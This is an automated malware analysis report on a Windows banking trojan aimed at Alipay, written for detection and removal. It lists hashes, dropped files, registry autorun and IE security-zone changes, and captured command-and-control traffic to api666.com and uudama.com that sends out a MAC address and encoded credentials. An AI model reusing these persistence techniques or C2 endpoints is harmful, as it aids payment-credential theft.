Trojan.GenericKD.2249578 (B) (Emsisoft), Trojan.GenericKD.2249578 (AdAware), GenericEmailWorm.YR, TrojanFlyStudio.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 07fd8bc3e2c460e17ad8a37c2f7dcf71
SHA1: f96243e4be9968625ff1977543681821967ab1d8
SHA256: 2494356cdf0a21950b75e365f9480cede5f3a1bd3b5a760b89bb935558118223
SSDeep: 49152:KNPDqXMXmf1UGXkVaW4mxDulVXN6kPof:DcXz2kVafqulV96kPof
Size: 2383872 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC50, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, Armadillov171, UPolyXv05_v6
Company: StdLib
Created at: 2015-03-15 10:03:33
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:348
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\My Documents\alipay_jmp.txt (135 bytes)
C:\UUWiseHelper.dll (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
Registry activity
The process %original file name%.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Internet Explorer\BrowserEmulation\ClearableListData]
"UserFilter" = "41 1F 00 00 53 08 AD BA 01 00 00 00 32 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU]
"alipay_hwnd" = "1638622"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 9F 70 B9 B5 4D F4 CA 48 79 50 12 B9 FF D9 F1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"EnableChromeTab" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"alipay" = "c:\%original file name%.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
afd14de763f7c540e686afdc55281039 | c:\UUWiseHelper.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:348
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\My Documents\alipay_jmp.txt (135 bytes)
C:\UUWiseHelper.dll (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"alipay" = "c:\%original file name%.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 1025359 | 1028096 | 4.5629 | f7279607e8fc344535125fc61a1364a1 |
.rdata | 1032192 | 1215612 | 1216512 | 4.25382 | d54b02a3965caadaa04bfcc027da235c |
.data | 2248704 | 302730 | 98304 | 3.74499 | d5beb10cdb7ac993a77fef1745a94747 |
.rsrc | 2551808 | 36416 | 36864 | 3.58565 | 2110b7b5888adc8dda4dc0f042f1526e |
Network Activity
URLs
URL | IP |
---|---|
hxxp://174.139.10.150/update/check.php?check=1.3 | |
hxxp://s1.uuwise.com/Api/config.aspx | 116.255.181.152 |
hxxp://lb.uudama.com/Api/VerifyAPIFile.aspx | 113.107.181.46 |
hxxp://lb.uudama.com/Api/UserLogin.aspx | 113.107.181.46 |
hxxp://lb.uudama.com/Api/UserPoint.aspx | 113.107.181.46 |
hxxp://www.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=3032273022523032253032133022603032461.3&gsd=303216303232302277303213303200302274 | 174.139.10.150 |
hxxp://www.api666.com/test.txt | 174.139.10.150 |
hxxp://www.api666.com/s_start.php?mac=00-0C-29-8E-22-D8 | 174.139.10.150 |
hxxp://www.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8 | 174.139.10.150 |
hxxp://www.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ | 174.139.10.150 |
hxxp://www.api666.com/update/check.php?check=1.3 | 174.139.10.150 |
1.cn.pool.ntp.org | 202.118.1.81 |
cn.pool.ntp.org | 202.112.31.197 |
www.baidu.com | 180.76.3.151 |
0.cn.pool.ntp.org | 202.112.10.36 |
2.cn.pool.ntp.org | 202.112.31.197 |
3.cn.pool.ntp.org | 202.112.31.197 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /Api/VerifyAPIFile.aspx HTTP/1.1
User-Agent: VersionClient
Cache-Control: no-cache
Accept: */*
TTL: 1427902891209
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 411
Host: lb.uudama.com
Connection: Keep-Alive
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"
2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Info"
449AA4D5026EF9F69DABB21D88F3E48D5BF5C582E09500EA5EB6004963E12D064C7056FFCD9F6D4A3234818CBBD7F9BEA51ECD2143FD05AC13B22AF4A008E145D45497F0D4AA397BAD5D995D49C9FBE1F2D5A3BFF89CBB65
---------------aabbccddeeff007dc3d73a70130--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 96
Connection: keep-alive
ServerV: 10043
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=errw3c454axfofnjx0vt5i45; path=/; HttpOnly
Cache-Control: private
24664F2554DDE337A2836DF3C253569DF6F31FF43DF8EA44FC6D7F086349C98773530F5133CD51B37DDD4C3725BB6ACB....
POST /Api/UserLogin.aspx HTTP/1.1
User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902895803
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 715
Host: lb.uudama.com
Connection: Keep-Alive
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"
1427902888412
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"
2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="NAME"
yexingzhe
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="PASS"
EFF0F22544B04226BABA0D48195CB738
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="INFO"
53F117A35BB9FB72B8794AD99C32C670DA1CE9477251DF95C3A439EA60D907977C5D06144FA4A75A0911A2CA163286F1DBB69B9831D6966145AF8B72BC088D99A76E37DC94FA128E
---------------aabbccddeeff007dc3d73a70130--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 448
Connection: keep-alive
ServerV: 10043
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=km2i1j55jei43rfrptpqqo2d; path=/; HttpOnly
Cache-Control: private
90FA3BD8B8F4C0FB5C8C0C32C99E75E8CFD80087C8E39FF35921E36C16F0E40851E73639FB007CC68C895BF5ABC12F4C90574383EC3C2402D3D229C4D6F72DA07E1167D21E09E155CF0AB2CAAC0B79BEF19A359F69A109126918A97FF79F775BBDC5C085FF09192A1C143AC6D27286E214D257F494D493CA2357972114F47C30AAE3CAF1CA680A9528E9769B368F781C150C0D4E3DF959459901F3BC40432FECDE44CBD76F905960801DB903F43EEA5A7D4F078F66E632BA753398903170661EC6262B45B85BFB3D8F49E38632FB12FC1B83EC57D18D8A550B505D6AC97E9A85....
POST /Api/UserPoint.aspx HTTP/1.1
User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902896709
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 1131
Host: lb.uudama.com
Connection: Keep-Alive
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"
1427902888412
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"
2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Name"
yexingzhe
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Pass"
0F9FA1A753ED4B73A5AAAFF1470CAD82
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="INFO"
CFB6490440EC58A8583E7CCE45CAA1E2FF40F971D5749BFDA033170E3DECBFABE04F61FE852DD0A5BB5C8FD21537922932F6A929A2CBB8E9C849A8777BC146413DA9A57AED4B6A70C2EF34B7225167955D9A2AC387A33097DBEAA9A98E37A30061745AF70F74D6E9A107EF5ABB1C14AA8061ABD5E231927DAC73209B88E8D999D99BD62D160264101E259CE5CB006D2EFB6A9571F65D7D73273949874C7EB6893D40ABA2F0BD7E0EC04509C39CAFC3662562A4655CD99884AF04443C534A752E87AEE4CEAF5FA17EA65F8B5AEAE6B64E74D9D204637C3B39A51B4C2C42A9F9807FA744E0BC5026970F87949CBABA945796B024AE5F693B46391B82E4FDE81D3B58CD42BE323AEFFA5EAAD82EE3B539FC7CF0C7C0D4802A76
---------------aabbccddeeff007dc3d73a70130--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:48 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 32
Connection: keep-alive
ServerV: 10042
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=isbsanbcme1d0oayrfsbua45; path=/; HttpOnly
Cache-Control: private
B7C330AFD0695F577B7CF17F1949442F....
POST /Api/UserPoint.aspx HTTP/1.1
User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902897100
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 1163
Host: lb.uudama.com
Connection: Keep-Alive
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"
1427902888412
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"
2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Name"
yexingzhe
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Pass"
85AEC333149A4BDE89478991F6BF38DB
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="INFO"
C184C9A78BFF61093CEF47F8371E5525D9745C83574220B9F02FD6BE1CBCB371FA9527D93AE5F4D522215FF69311C7440EC8D4D3869F10C6640109694F8594D9EAE5163999F2EDE275ED63A982B36EE7E399379FD2A9E96E8D0A54AC7187182C0855505F3E14E30C07E97D5F3BE8CB80DFF6F062E80B4BDEBB191A126027D811191EC6F3E62A2462CE7764282B6B47D6D2E2A5A206C4F750A093D2225CCB06D24118D02829B2AA44CFC7C66C81222AE3EA70CAB8131D822225932740430BD6D96635A0F952386B2BF8C928D1736FEAE5276056809B7C5E4438EB10F53D2E0949BB985FDEAC093ECADED90B5D1C82C93459F2A3A84120D11F1772869606E1C03624D1F4A7CB3811F54580D4050EBAC7D4DA6389ACCF0FB11EC9C78C550B026EDB7C148009C744338D
---------------aabbccddeeff007dc3d73a70130--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:49 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 32
Connection: keep-alive
ServerV: 10034
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0hnlrqaqa4bquqy5fov5fb55; path=/; HttpOnly
Cache-Control: private
FBD18BEAEAB719B13CB86C11C616EDA7..
GET /test.txt HTTP/1.1
Referer: hXXp://VVV.api666.com/test.txt
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:42:26 GMT
Content-Length: 2
Content-Type: text/plain
Content-Location: hXXp://VVV.api666.com/test.txt
Last-Modified: Sat, 21 Mar 2015 09:35:57 GMT
Accept-Ranges: bytes
ETag: "f2eb806fba63d01:471cb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ok....
GET /s_start.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_start.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
no..
GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
GET /test.txt HTTP/1.1
Referer: hXXp://VVV.api666.com/test.txt
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:41:56 GMT
Content-Length: 2
Content-Type: text/plain
Content-Location: hXXp://VVV.api666.com/test.txt
Last-Modified: Sat, 21 Mar 2015 09:35:57 GMT
Accept-Ranges: bytes
ETag: "f2eb806fba63d01:471cb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ok....
GET /s_start.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_start.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
no..
GET /update/check.php?check=1.3 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.api666.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html
GET /test.txt HTTP/1.1
Referer: hXXp://VVV.api666.com/test.txt
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:42:11 GMT
Content-Length: 2
Content-Type: text/plain
Content-Location: hXXp://VVV.api666.com/test.txt
Last-Modified: Sat, 21 Mar 2015 09:35:57 GMT
Accept-Ranges: bytes
ETag: "f2eb806fba63d01:471cb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ok....
GET /s_start.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_start.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
no..
GET /s_getbox.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html
----..
GET /s_getbox.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html
----..
POST /Api/config.aspx HTTP/1.1
User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902888443
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 376
Host: s1.uuwise.com
Connection: Keep-Alive
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="HASH"
50FB130BCA1FFB4B2C642C8E94620915
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"
2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"
1427902888412
---------------aabbccddeeff007dc3d73a70130--
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:41:45 GMT
Server: Microsoft-IIS/6.0
ServerV: 10035
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ls0cgemfccjrhfnhkldqov55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 176
313030302C6C622E757564616D612E636F6D3A38303A3130312C7570622E7575776973652E636F6D3A38303A3130322C7570622E7575776973652E636F6D3A38303A3130332C7C307C39312E3230302E3135392E31333120..
GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
add..
GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
GET /s_getbox.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html
----..
Strings from Dumps
%original file name%.exe_348:
.text
`.rdata
@.data
.rsrc
t%SVh
t$(SSh
~%UVW
u$SShe
UUWiseHelper.dll
ole32.dll
user32.dll
OLEACC.DLL
kernel32.dll
wininet.dll
uu_loginA
yexingzhe|,|yexingzhe|,|wanbaolu_566@163.com\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
VVV.baidu.com
32F1C86B-E64C-4EAF-8BC1-C142570008BC
\UUWiseHelper.dll
@.reloc
SSSSh
ByScreen.JPG
operator
GetProcessWindowStation
E:\work\UUWiseHelper
\UUWiseHelper.pdb
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
SHLWAPI.dll
urlmon.dll
dbghelp.dll
gdiplus.dll
IPHLPAPI.DLL
WS2_32.dll
GetProcessHeap
GetCPInfo
UUWiseHelper.DLL
uu_easyRecognizeUrlA
uu_easyRecognizeUrlW
uu_loginW
uu_recognizeByCodeTypeAndUrlA
uu_recognizeByCodeTypeAndUrlW
uu_reportError
zcÃ
0(1,10141
9 9
:-1014,URL
:-19011,
TEAKEY
my.alipay.com
consumeprod.alipay.com
fastpaycashier.htm
ebankpay.htm
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
hXXp://cashier.alipay.com/standard/payment/cashier.htm?orderId=
hXXp://VVV.api666.com/
hXXp://VVV.ip.cn/
SQLite format 3
CREATE TABLE tblSwitcher(key LONGVARCHAR,pattern LONGVARCHAR NOT NULL,type INTEGER NOT NULL,flag INTEGER DEFAULT 0 NOT NULL,set_time INTEGER NOT NULL,action INTEGER NOT NULL DEFAULT 1,primary key(key, pattern))5
indexsqlite_autoindex_tblSwitcher_1tblSwitcher
CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)'
indexsqlite_autoindex_meta_1meta
alipay.comconsumeprod.alipay.com
alipay.commy.alipay.com
alipay.comcashierztg.alipay.com
alipay.comcashierzue.alipay.com
alipay.comcashierzth.alipay.com
alipay.comfinanceprod.alipay.com
alipay.comshenghuo.alipay.com
alipay.comVVV.alipay.com
MCPattern3.db
